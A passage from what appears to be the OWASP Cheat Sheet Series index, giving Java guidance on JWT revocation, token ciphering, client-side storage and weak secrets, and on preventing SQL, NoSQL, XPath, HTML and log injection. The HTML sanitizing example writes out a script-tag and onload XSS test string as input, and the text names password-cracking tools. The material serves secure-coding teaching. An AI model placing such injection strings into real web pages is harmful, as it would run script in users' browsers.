rSet.next();\n}\n}\n}\n}\n\nreturn tokenIsPresent;\n}\n\n\n/**\n  * Add a digest encoded in HEX of the ciphered token to the revocation token table\n  *\n  * @param jwtInHex Token encoded in HEX\n  * @throws Exception If any issue occur during communication with DB\n  */\npublic void revokeToken(String jwtInHex) throws Exception {\nif (jwtInHex != null && !jwtInHex.trim().isEmpty()) {\n//Decode the ciphered token\nbyte[] cipheredToken = DatatypeConverter.parseHexBinary(jwtInHex);\n\n//Compute a SHA256 of the ciphered token\nMessageDigest digest = MessageDigest.getInstance(\"SHA-256\");\nbyte[] cipheredTokenDigest = digest.digest(cipheredToken);\nString jwtTokenDigestInHex = DatatypeConverter.printHexBinary(cipheredTokenDigest);\n\n//Check if the token digest in HEX is already in the DB and add it if it is absent\nif (!this.isTokenRevoked(jwtInHex)) {\ntry (Connection con = this.storeDS.getConnection()) {\nString query = \"insert into revoked_token(jwt_token_digest) values(?)\";\nint insertedRecordCount;\ntry (PreparedStatement pStatement = con.prepareStatement(query)) {\npStatement.setString(1, jwtTokenDigestInHex);\ninsertedRecordCount = pStatement.executeUpdate();\n}\nif (insertedRecordCount != 1) {\nthrow new IllegalStateException(\"Number of inserted record is invalid,\" +\n\" 1 expected but is \" + insertedRecordCount);\n}\n}\n}\n\n}\n}\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#token-information-disclosure","title":"Token Information Disclosure","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#symptom_3","title":"Symptom","text":"

This attack occurs when an attacker has access to a token (or a set of tokens) and extracts the information stored in it (the contents of JWT tokens are base64 encoded, but are not encrypted by default) in order to obtain information about the system. This information can include, for example, security roles, the login format, and so on.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#how-to-prevent_3","title":"How to Prevent","text":"

A way to protect against this attack is to cipher the token using, for example, a symmetric algorithm.

It's also important to protect the ciphered data against attacks such as padding oracle attacks or any other attack based on cryptanalysis.

In order to achieve all these goals, the AES-GCM algorithm is used, which provides Authenticated Encryption with Associated Data (AEAD).

More details from here:

AEAD primitive (Authenticated Encryption with Associated Data) provides functionality of symmetric\nauthenticated encryption.\n\nImplementations of this primitive are secure against adaptive chosen ciphertext attacks.\n\nWhen encrypting a plaintext one can optionally provide associated data that should be authenticated\nbut not encrypted.\n\nThat is, the encryption with associated data ensures authenticity (ie. who the sender is) and\nintegrity (ie. data has not been tampered with) of that data, but not its secrecy.\n\nSee RFC5116: https://tools.ietf.org/html/rfc5116\n

Note:

Here, ciphering is added mainly to hide internal information, but it's very important to remember that the first protection against tampering of the JWT token is the signature. So, the token signature and its verification must always be in place.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#implementation-example_3","title":"Implementation Example","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#token-ciphering","title":"Token Ciphering","text":"

Code in charge of managing the ciphering. The dedicated crypto library Google Tink is used to handle the ciphering operations in order to benefit from the built-in best practices this library provides.

/**\n * Handle ciphering and deciphering of the token using AES-GCM.\n *\n * @see \"https://github.com/google/tink/blob/master/docs/JAVA-HOWTO.md\"\n */\npublic class TokenCipher {\n\n/**\n     * Constructor - Register AEAD configuration\n     *\n     * @throws Exception If any issue occur during AEAD configuration registration\n     */\npublic TokenCipher() throws Exception {\nAeadConfig.register();\n}\n\n/**\n     * Cipher a JWT\n     *\n     * @param jwt          Token to cipher\n     * @param keysetHandle Pointer to the keyset handle\n     * @return The ciphered version of the token encoded in HEX\n     * @throws Exception If any issue occur during token ciphering operation\n     */\npublic String cipherToken(String jwt, KeysetHandle keysetHandle) throws Exception {\n//Verify parameters\nif (jwt == null || jwt.isEmpty() || keysetHandle == null) {\nthrow new IllegalArgumentException(\"Both parameters must be specified!\");\n}\n\n//Get the primitive\nAead aead = AeadFactory.getPrimitive(keysetHandle);\n\n//Cipher the token\nbyte[] cipheredToken = aead.encrypt(jwt.getBytes(), null);\n\nreturn DatatypeConverter.printHexBinary(cipheredToken);\n}\n\n/**\n     * Decipher a JWT\n     *\n     * @param jwtInHex     Token to decipher encoded in HEX\n     * @param keysetHandle Pointer to the keyset handle\n     * @return The token in clear text\n     * @throws Exception If any issue occur during token deciphering operation\n     */\npublic String decipherToken(String jwtInHex, KeysetHandle keysetHandle) throws Exception {\n//Verify parameters\nif (jwtInHex == null || jwtInHex.isEmpty() || keysetHandle == null) {\nthrow new IllegalArgumentException(\"Both parameters must be specified !\");\n}\n\n//Decode the ciphered token\nbyte[] cipheredToken = DatatypeConverter.parseHexBinary(jwtInHex);\n\n//Get the primitive\nAead aead = AeadFactory.getPrimitive(keysetHandle);\n\n//Decipher the token\nbyte[] decipheredToken = aead.decrypt(cipheredToken, null);\n\nreturn new String(decipheredToken);\n}\n}\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#creation-validation-of-the-token","title":"Creation / Validation of the Token","text":"

Use the token ciphering handler during the creation and the validation of the token.

Load the keys (the ciphering key was generated and stored using Google Tink) and set up the cipher.

//Load keys from configuration text/json files in order to avoid storing keys as a String in JVM memory\nprivate transient byte[] keyHMAC = Files.readAllBytes(Paths.get(\"src\", \"main\", \"conf\", \"key-hmac.txt\"));\nprivate transient KeysetHandle keyCiphering = CleartextKeysetHandle.read(JsonKeysetReader.withFile(\nPaths.get(\"src\", \"main\", \"conf\", \"key-ciphering.json\").toFile()));\n\n...\n\n//Init token ciphering handler\nTokenCipher tokenCipher = new TokenCipher();\n

Token creation.

//Generate the JWT token using the JWT API...\n//Cipher the token (String JSON representation)\nString cipheredToken = tokenCipher.cipherToken(token, this.keyCiphering);\n//Send the ciphered token encoded in HEX to the client in HTTP response...\n

Token validation.

//Retrieve the ciphered token encoded in HEX from the HTTP request...\n//Decipher the token\nString token = tokenCipher.decipherToken(cipheredToken, this.keyCiphering);\n//Verify the token using the JWT API...\n//Verify access...\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#token-storage-on-client-side","title":"Token Storage on Client Side","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#symptom_4","title":"Symptom","text":"

This occurs when an application stores the token in a manner that exposes it: for example, in storage that is automatically sent by the browser (cookie storage), that persists even if the browser is restarted (local storage), or that can be read by injected JavaScript in the event of an XSS attack.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#how-to-prevent_4","title":"How to Prevent","text":"
  1. Store the token using the browser sessionStorage container, or use JavaScript closures with private variables.
  2. Add it as a Bearer HTTP Authentication header with JavaScript when calling services.
  3. Add fingerprint information to the token.

Storing the token in the browser sessionStorage container exposes the token to being stolen through an XSS attack. However, the fingerprint added to the token prevents reuse of the stolen token by the attacker on their own machine. To close as many exploitation surfaces as possible for an attacker, add a browser Content Security Policy to harden the execution context, as sketched below.
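
As an illustration only (this snippet is not part of the original sample project), such a Content Security Policy can be set as an HTTP response header from a servlet or filter; the policy value below is a placeholder to adapt to your application:

//Hypothetical helper - set a restrictive Content Security Policy header on the HTML response\n//The policy value is an example to adapt, not a one-size-fits-all recommendation\npublic void addContentSecurityPolicy(HttpServletResponse response) {\nresponse.setHeader(\"Content-Security-Policy\",\n\"default-src 'self'; script-src 'self'; object-src 'none'; frame-ancestors 'none'\");\n}\n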

An alternative to storing the token in the browser sessionStorage is to use a JavaScript private variable or closures. With this approach, all web requests are routed through a JavaScript module that encapsulates the token in a private variable that cannot be accessed from outside the module.

Note:

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#implementation-example_4","title":"Implementation Example","text":"

JavaScript code to store the token after authentication.

/* Handle request for JWT token and local storage*/\nfunction authenticate() {\nconst login = $(\"#login\").val();\nconst postData = \"login=\" + encodeURIComponent(login) + \"&password=test\";\n\n$.post(\"/services/authenticate\", postData, function (data) {\nif (data.status == \"Authentication successful!\") {\n...\nsessionStorage.setItem(\"token\", data.token);\n}\nelse {\n...\nsessionStorage.removeItem(\"token\");\n}\n})\n.fail(function (jqXHR, textStatus, error) {\n...\nsessionStorage.removeItem(\"token\");\n});\n}\n

JavaScript code to add the token as a Bearer HTTP Authentication header when calling a service, in this example a token validation service.

/* Handle request for JWT token validation */\nfunction validateToken() {\nvar token = sessionStorage.getItem(\"token\");\n\nif (token == undefined || token == \"\") {\n$(\"#infoZone\").removeClass();\n$(\"#infoZone\").addClass(\"alert alert-warning\");\n$(\"#infoZone\").text(\"Obtain a JWT token first :)\");\nreturn;\n}\n\n$.ajax({\nurl: \"/services/validate\",\ntype: \"POST\",\nbeforeSend: function (xhr) {\nxhr.setRequestHeader(\"Authorization\", \"bearer \" + token);\n},\nsuccess: function (data) {\n...\n},\nerror: function (jqXHR, textStatus, error) {\n...\n},\n});\n}\n

JavaScript code to implement closures with private variables:

function myFetchModule() {\n// Protect the original 'fetch' from getting overwritten via XSS\nconst fetch = window.fetch;\n\nconst authOrigins = [\"https://yourorigin\", \"http://localhost\"];\nlet token = '';\n\nthis.setToken = (value) => {\ntoken = value\n}\n\nthis.fetch = (resource, options) => {\nlet req = new Request(resource, options);\ndestOrigin = new URL(req.url).origin;\nif (token && authOrigins.includes(destOrigin)) {\nreq.headers.set('Authorization', token);\n}\nreturn fetch(req)\n}\n}\n\n...\n\n// usage:\nconst myFetch = new myFetchModule()\n\nfunction login() {\nfetch(\"/api/login\")\n.then((res) => {\nif (res.status == 200) {\nreturn res.json()\n} else {\nthrow Error(res.statusText)\n}\n})\n.then(data => {\nmyFetch.setToken(data.token)\nconsole.log(\"Token received and stored.\")\n})\n.catch(console.error)\n}\n\n...\n\n// after login, subsequent api calls:\nfunction makeRequest() {\nmyFetch.fetch(\"/api/hello\", {headers: {\"MyHeader\": \"foobar\"}})\n.then((res) => {\nif (res.status == 200) {\nreturn res.text()\n} else {\nthrow Error(res.statusText)\n}\n}).then(responseText => console.log(\"helloResponse\", responseText))\n.catch(console.error)\n}\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#weak-token-secret","title":"Weak Token Secret","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#symptom_5","title":"Symptom","text":"

When the token is protected using an HMAC based algorithm, the security of the token is entirely dependent on the strength of the secret used with the HMAC. If an attacker can obtain a valid JWT, they can then carry out an offline attack and attempt to crack the secret using tools such as John the Ripper or Hashcat.

If they are successful, they would then be able to modify the token and re-sign it with the key they had obtained. This could let them escalate their privileges, compromise other users' accounts, or perform other actions depending on the contents of the JWT.

There are a number of guides that document this process in greater detail.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#how-to-prevent_5","title":"How to Prevent","text":"

The simplest way to prevent this attack is to ensure that the secret used to sign the JWTs is strong and unique, in order to make it harder for an attacker to crack. As this secret would never need to be typed by a human, it should be at least 64 characters, and generated using a secure source of randomness.
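
As a minimal sketch of how such a secret could be produced (the 64-byte length and HEX encoding are example choices, not requirements of the project above), SecureRandom can be used:

//Generate a 64-byte random secret with a cryptographically secure generator (example approach)\nSecureRandom secureRandom = new SecureRandom();\nbyte[] secret = new byte[64];\nsecureRandom.nextBytes(secret);\n//Encode it in HEX so it can be stored in the application configuration\nString hmacSecretInHex = DatatypeConverter.printHexBinary(secret);\n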

Alternatively, consider the use of tokens that are signed with RSA rather than using an HMAC and secret key.
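
As a sketch of this asymmetric alternative, and assuming the same JWT library used in the examples above, an RSA key pair can be used so that only the holder of the private key can sign tokens; the key loading is hypothetical here:

//Assumption: an RSA key pair has been generated and loaded securely elsewhere\nRSAPublicKey publicKey = ...;\nRSAPrivateKey privateKey = ...;\n\n//Sign the token with the private key\nString token = JWT.create().withSubject(login).sign(Algorithm.RSA256(publicKey, privateKey));\n\n//Verify the token using only the public key\nJWTVerifier verifier = JWT.require(Algorithm.RSA256(publicKey, null)).build();\nDecodedJWT decodedToken = verifier.verify(token);\n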

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#further-reading","title":"Further Reading","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html","title":"Java Security Cheat Sheet","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#injection-prevention-in-java","title":"Injection Prevention in Java","text":"

This section aims to provide tips to handle Injection in Java application code.

The sample code used in these tips is located here.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#what-is-injection","title":"What is Injection","text":"

Injection in the OWASP Top 10 is defined as follows:

Consider anyone who can send untrusted data to the system, including external users, internal users, and administrators.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#general-advices-to-prevent-injection","title":"General advices to prevent Injection","text":"

The following points can be applied, in a general way, to prevent Injection issues:

  1. Apply Input Validation (using an \"allow list\" approach) combined with Output Sanitizing+Escaping on user input/output.
  2. If you need to interact with the system, try to use the API features provided by your technology stack (Java / .Net / PHP...) instead of building commands.

Additional advice is provided in this cheatsheet.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#specific-injection-types","title":"Specific Injection types","text":"

Examples in this section are provided in Java (see the associated Maven project), but the advice is applicable to other technologies like .Net / PHP / Ruby / Python...

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#sql","title":"SQL","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symptom","title":"Symptom","text":"

Injection of this type occurs when the application uses untrusted user input to build an SQL query using a String and execute it.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#how-to-prevent","title":"How to prevent","text":"

Use Query Parameterization in order to prevent injection.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example","title":"Example","text":"
/*No DB framework used here in order to show the real use of\n  Prepared Statement from Java API*/\n/*Open connection with H2 database and use it*/\nClass.forName(\"org.h2.Driver\");\nString jdbcUrl = \"jdbc:h2:file:\" + new File(\".\").getAbsolutePath() + \"/target/db\";\ntry (Connection con = DriverManager.getConnection(jdbcUrl)) {\n\n/* Sample A: Select data using Prepared Statement*/\nString query = \"select * from color where friendly_name = ?\";\nList<String> colors = new ArrayList<>();\ntry (PreparedStatement pStatement = con.prepareStatement(query)) {\npStatement.setString(1, \"yellow\");\ntry (ResultSet rSet = pStatement.executeQuery()) {\nwhile (rSet.next()) {\ncolors.add(rSet.getString(1));\n}\n}\n}\n\n/* Sample B: Insert data using Prepared Statement*/\nquery = \"insert into color(friendly_name, red, green, blue) values(?, ?, ?, ?)\";\nint insertedRecordCount;\ntry (PreparedStatement pStatement = con.prepareStatement(query)) {\npStatement.setString(1, \"orange\");\npStatement.setInt(2, 239);\npStatement.setInt(3, 125);\npStatement.setInt(4, 11);\ninsertedRecordCount = pStatement.executeUpdate();\n}\n\n/* Sample C: Update data using Prepared Statement*/\nquery = \"update color set blue = ? where friendly_name = ?\";\nint updatedRecordCount;\ntry (PreparedStatement pStatement = con.prepareStatement(query)) {\npStatement.setInt(1, 10);\npStatement.setString(2, \"orange\");\nupdatedRecordCount = pStatement.executeUpdate();\n}\n\n/* Sample D: Delete data using Prepared Statement*/\nquery = \"delete from color where friendly_name = ?\";\nint deletedRecordCount;\ntry (PreparedStatement pStatement = con.prepareStatement(query)) {\npStatement.setString(1, \"orange\");\ndeletedRecordCount = pStatement.executeUpdate();\n}\n\n}\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#jpa","title":"JPA","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symptom_1","title":"Symptom","text":"

Injection of this type occurs when the application uses untrusted user input to build a JPA query using a String and execute it. It's quite similar to SQL injection, but here the targeted language is not SQL but JPA QL.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#how-to-prevent_1","title":"How to prevent","text":"

Use Java Persistence Query Language Query Parameterization in order to prevent injection.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example_1","title":"Example","text":"
EntityManager entityManager = null;\ntry {\n/* Get a ref on EntityManager to access DB */\nentityManager = Persistence.createEntityManagerFactory(\"testJPA\").createEntityManager();\n\n/* Define parameterized query prototype using named parameter to enhance readability */\nString queryPrototype = \"select c from Color c where c.friendlyName = :colorName\";\n\n/* Create the query, set the named parameter and execute the query */\nQuery queryObject = entityManager.createQuery(queryPrototype);\nColor c = (Color) queryObject.setParameter(\"colorName\", \"yellow\").getSingleResult();\n\n} finally {\nif (entityManager != null && entityManager.isOpen()) {\nentityManager.close();\n}\n}\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#references_1","title":"References","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#operating-system","title":"Operating System","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symptom_2","title":"Symptom","text":"

Injection of this type occurs when the application uses untrusted user input to build an Operating System command using a String and execute it.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#how-to-prevent_2","title":"How to prevent","text":"

Use the technology stack API in order to prevent injection.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example_2","title":"Example","text":"
/* The context taken is, for example, to perform a PING against a computer.\n* The prevention is to use the feature provided by the Java API instead of building\n* a system command as String and execute it */\nInetAddress host = InetAddress.getByName(\"localhost\");\nvar reachable = host.isReachable(5000);\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#references_2","title":"References","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#xml-xpath-injection","title":"XML: XPath Injection","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symptom_3","title":"Symptom","text":"

Injection of this type occurs when the application uses untrusted user input to build an XPath query using a String and execute it.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#how-to-prevent_3","title":"How to prevent","text":"

Use an XPath Variable Resolver in order to prevent injection.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example_3","title":"Example","text":"

Variable Resolver implementation.

/**\n * Resolver in order to define parameter for XPATH expression.\n *\n */\npublic class SimpleVariableResolver implements XPathVariableResolver {\n\nprivate final Map<QName, Object> vars = new HashMap<QName, Object>();\n\n/**\n     * External methods to add parameter\n     *\n     * @param name Parameter name\n     * @param value Parameter value\n     */\npublic void addVariable(QName name, Object value) {\nvars.put(name, value);\n}\n\n/**\n     * {@inheritDoc}\n     *\n     * @see javax.xml.xpath.XPathVariableResolver#resolveVariable(javax.xml.namespace.QName)\n     */\npublic Object resolveVariable(QName variableName) {\nreturn vars.get(variableName);\n}\n}\n

Code using it to perform XPath query.

/*Create a XML document builder factory*/\nDocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();\n\n/*Disable External Entity resolution for different cases*/\n//Do not performed here in order to focus on variable resolver code\n//but do it for production code !\n\n/*Load XML file*/\nDocumentBuilder builder = dbf.newDocumentBuilder();\nDocument doc = builder.parse(new File(\"src/test/resources/SampleXPath.xml\"));\n\n/* Create and configure parameter resolver */\nString bid = \"bk102\";\nSimpleVariableResolver variableResolver = new SimpleVariableResolver();\nvariableResolver.addVariable(new QName(\"bookId\"), bid);\n\n/*Create and configure XPATH expression*/\nXPath xpath = XPathFactory.newInstance().newXPath();\nxpath.setXPathVariableResolver(variableResolver);\nXPathExpression xPathExpression = xpath.compile(\"//book[@id=$bookId]\");\n\n/* Apply expression on XML document */\nObject nodes = xPathExpression.evaluate(doc, XPathConstants.NODESET);\nNodeList nodesList = (NodeList) nodes;\nElement book = (Element)nodesList.item(0);\nvar containsRalls = book.getTextContent().contains(\"Ralls, Kim\");\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#references_3","title":"References","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#htmljavascriptcss","title":"HTML/JavaScript/CSS","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symptom_4","title":"Symptom","text":"

Injection of this type occurs when the application uses untrusted user input to build an HTTP response and send it to the browser.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#how-to-prevent_4","title":"How to prevent","text":"

Either apply strict input validation (\"allow list\" approach) or use output sanitizing+escaping if input validation is not possible (combine both whenever possible).

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example_4","title":"Example","text":"
/*\nINPUT WAY: Receive data from user\nHere it's recommended to use strict input validation using an \"allow list\" approach.\nIn fact, you ensure that only allowed characters are part of the input received.\n*/\n\nString userInput = \"You user login is owasp-user01\";\n\n/* First we check that the value contains only expected characters*/\nif (!Pattern.matches(\"[a-zA-Z0-9\\\\s\\\\-]{1,50}\", userInput))\n{\nreturn false;\n}\n\n/* If the first check passes, then ensure that potentially dangerous characters\nthat we have allowed for business requirements are not used in a dangerous way.\nFor example, here we have allowed the character '-', and this can\nbe used in SQL injection, so we\nensure that this character is not used in a continuous form.\nUse the API COMMONS LANG v3 to help in String analysis...\n*/\nif (0 != StringUtils.countMatches(userInput.replace(\" \", \"\"), \"--\"))\n{\nreturn false;\n}\n\n/*\nOUTPUT WAY: Send data to user\nHere we escape + sanitize any data sent to the user\nUse the OWASP Java HTML Sanitizer API to handle sanitizing\nUse the OWASP Java Encoder API to handle HTML tag encoding (escaping)\n*/\n\nString outputToUser = \"You <p>user login</p> is <strong>owasp-user01</strong>\";\noutputToUser += \"<script>alert(22);</script><img src='#' onload='javascript:alert(23);'>\";\n\n/* Create a sanitizing policy that only allows the tags '<p>' and '<strong>'*/\nPolicyFactory policy = new HtmlPolicyBuilder().allowElements(\"p\", \"strong\").toFactory();\n\n/* Sanitize the output that will be sent to the user*/\nString safeOutput = policy.sanitize(outputToUser);\n\n/* Encode HTML Tags*/\nsafeOutput = Encode.forHtml(safeOutput);\nString finalSafeOutputExpected = \"You <p>user login</p> is <strong>owasp-user01</strong>\";\nif (!finalSafeOutputExpected.equals(safeOutput))\n{\nreturn false;\n}\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#references_4","title":"References","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#ldap","title":"LDAP","text":"

A dedicated cheatsheet has been created.
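
The dedicated cheat sheet remains the reference; as a minimal sketch only, JNDI allows the search filter to be parameterized so that user input is never concatenated into the filter string (the directory URL and attribute name below are assumptions):

//Hypothetical JNDI setup - adapt the environment to your directory\nHashtable<String, String> env = new Hashtable<>();\nenv.put(Context.INITIAL_CONTEXT_FACTORY, \"com.sun.jndi.ldap.LdapCtxFactory\");\nenv.put(Context.PROVIDER_URL, \"ldap://localhost:389\");\nDirContext ctx = new InitialDirContext(env);\n\n//Pass the user input as a filter argument ({0}) instead of concatenating it into the filter\nString userInput = \"jdoe\";\nSearchControls controls = new SearchControls();\nNamingEnumeration<SearchResult> results = ctx.search(\"ou=people,dc=example,dc=com\",\n\"(uid={0})\", new Object[]{userInput}, controls);\n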

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#nosql","title":"NoSQL","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symptom_5","title":"Symptom","text":"

Injection of this type occurs when the application uses untrusted user input to build a NoSQL API call expression.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#how-to-prevent_5","title":"How to prevent","text":"

As there are many NoSQL database systems and each one uses its own API for calls, it's important to ensure that user input received and used to build the API call expression does not contain any character that has a special meaning in the target API syntax. This is to prevent the input from being used to escape the initial call expression and create another one based on crafted user input. It's also important not to use string concatenation to build the API call expression, but to use the API itself to create the expression.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example-mongodb","title":"Example - MongoDB","text":"
/* Here use MongoDB as target NoSQL DB */\nString userInput = \"Brooklyn\";\n\n/* First ensure that the input does not contain any special characters\nfor the current NoSQL DB call API,\nhere they are: ' \" \\ ; { } $\n*/\n//Avoid regexp this time in order to make the validation code\n//easier to read and understand...\nArrayList<String> specialCharsList = new ArrayList<String>() {\n{\nadd(\"'\");\nadd(\"\\\"\");\nadd(\"\\\\\");\nadd(\";\");\nadd(\"{\");\nadd(\"}\");\nadd(\"$\");\n}\n};\n\nfor (String specChar: specialCharsList) {\nif (userInput.contains(specChar)) {\nreturn false;\n}\n}\n\n//Add also a check on the input max size\nif (userInput.length() > 50)\n{\nreturn false;\n}\n\n/* Then perform the query on the database using the API to build the expression */\n//Connect to the local MongoDB instance\ntry(MongoClient mongoClient = new MongoClient()){\nMongoDatabase db = mongoClient.getDatabase(\"test\");\n//Use the API query builder to create the call expression\n//Create expression\nBson expression = eq(\"borough\", userInput);\n//Perform call\nFindIterable<org.bson.Document> restaurants = db.getCollection(\"restaurants\").find(expression);\n//Verify result consistency\nrestaurants.forEach(new Block<org.bson.Document>() {\n@Override\npublic void apply(final org.bson.Document doc) {\nString restBorough = (String)doc.get(\"borough\");\nif (!\"Brooklyn\".equals(restBorough))\n{\n//apply() returns void, so signal the inconsistency with an exception instead of returning a value\nthrow new IllegalStateException(\"Unexpected borough value: \" + restBorough);\n}\n}\n});\n}\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#references_5","title":"References","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#log-injection","title":"Log Injection","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symptom_6","title":"Symptom","text":"

Log Injection occurs when an application includes untrusted data in an application log message (e.g., an attacker can cause an additional log entry that looks like it came from a completely different user, if they can inject CRLF characters in the untrusted data). More information about this attack is available on the OWASP Log Injection page.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#how-to-prevent_6","title":"How to prevent","text":"

To prevent an attacker from writing malicious content into the application log, apply defenses such as filtering or encoding any CR/LF characters in user input that ends up in log messages and limiting the size of the logged value, as illustrated by the logging policy configurations below.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example-using-log4j2","title":"Example using Log4j2","text":"

Configuration of a logging policy to roll on 10 files of 5MB each, and encode/limit the log message using the Pattern encode{}{CRLF}, introduced in Log4j2 v2.10.0, and the -500m message size limit:

<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<Configuration status=\"error\" name=\"SecureLoggingPolicy\">\n<Appenders>\n<RollingFile name=\"RollingFile\" fileName=\"App.log\" filePattern=\"App-%i.log\" ignoreExceptions=\"false\">\n<PatternLayout>\n<!-- Encode any CRLF chars in the message and limit its\n                     maximum size to 500 characters -->\n<Pattern>%d{ISO8601} %-5p - %encode{ %.-500m }{CRLF}%n</Pattern>\n</PatternLayout>\n<Policies>\n<SizeBasedTriggeringPolicy size=\"5MB\"/>\n</Policies>\n<DefaultRolloverStrategy max=\"10\"/>\n</RollingFile>\n</Appenders>\n<Loggers>\n<Root level=\"debug\">\n<AppenderRef ref=\"RollingFile\"/>\n</Root>\n</Loggers>\n</Configuration>\n

Usage of the logger at code level:

import org.apache.logging.log4j.LogManager;\nimport org.apache.logging.log4j.Logger;\n...\n// No special action needed because security actions are\n// performed at the logging policy level\nLogger logger = LogManager.getLogger(MyClass.class);\nlogger.info(logMessage);\n...\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example-using-logback-with-the-owasp-security-logging-library","title":"Example using Logback with the OWASP Security Logging library","text":"

Configuration of a logging policy to roll on 10 files of 5MB each, and encode/limit the log message using the CRLFConverter, provided by the no longer active OWASP Security Logging Project, and the -500msg message size limit:

<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<configuration>\n<!-- Define the CRLFConverter -->\n<conversionRule conversionWord=\"crlf\" converterClass=\"org.owasp.security.logging.mask.CRLFConverter\" />\n<appender name=\"RollingFile\" class=\"ch.qos.logback.core.rolling.RollingFileAppender\">\n<file>App.log</file>\n<rollingPolicy class=\"ch.qos.logback.core.rolling.FixedWindowRollingPolicy\">\n<fileNamePattern>App-%i.log</fileNamePattern>\n<minIndex>1</minIndex>\n<maxIndex>10</maxIndex>\n</rollingPolicy>\n<triggeringPolicy class=\"ch.qos.logback.core.rolling.SizeBasedTriggeringPolicy\">\n<maxFileSize>5MB</maxFileSize>\n</triggeringPolicy>\n<encoder>\n<!-- Encode any CRLF chars in the message and limit\n                 its maximum size to 500 characters -->\n<pattern>%relative [%thread] %-5level %logger{35} - %crlf(%.-500msg) %n</pattern>\n</encoder>\n</appender>\n<root level=\"debug\">\n<appender-ref ref=\"RollingFile\" />\n</root>\n</configuration>\n

You also have to add the OWASP Security Logging dependency to your project.

Usage of the logger at code level:

import org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n...\n// No special action needed because security actions\n// are performed at the logging policy level\nLogger logger = LoggerFactory.getLogger(MyClass.class);\nlogger.info(logMessage);\n...\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#references_6","title":"References","text":"
Note that the default Log4j2 encode{} encoder is HTML, which does NOT prevent log injection.\n\nIt prevents XSS attacks against viewing logs using a browser.\n\nOWASP recommends defending against XSS attacks in such situations in the log viewer application itself,\nnot by preencoding all the log messages with HTML encoding as such log entries may be used/viewed in many\nother log viewing/analysis tools that don't expect the log data to be pre-HTML encoded.\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#cryptography","title":"Cryptography","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#general-cryptography-guidance","title":"General cryptography guidance","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#encryption-for-storage","title":"Encryption for storage","text":"

Follow the algorithm guidance in the OWASP Cryptographic Storage Cheat Sheet.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symmetric-example-using-google-tink","title":"Symmetric example using Google Tink","text":"

Google Tink has documentation on performing common tasks.

For example, this page (from Google's website) shows how to perform simple symmetric encryption.

The following code snippet shows an encapsulated use of this functionality:

Click here to view the \"Tink symmetric encryption\" code snippet.
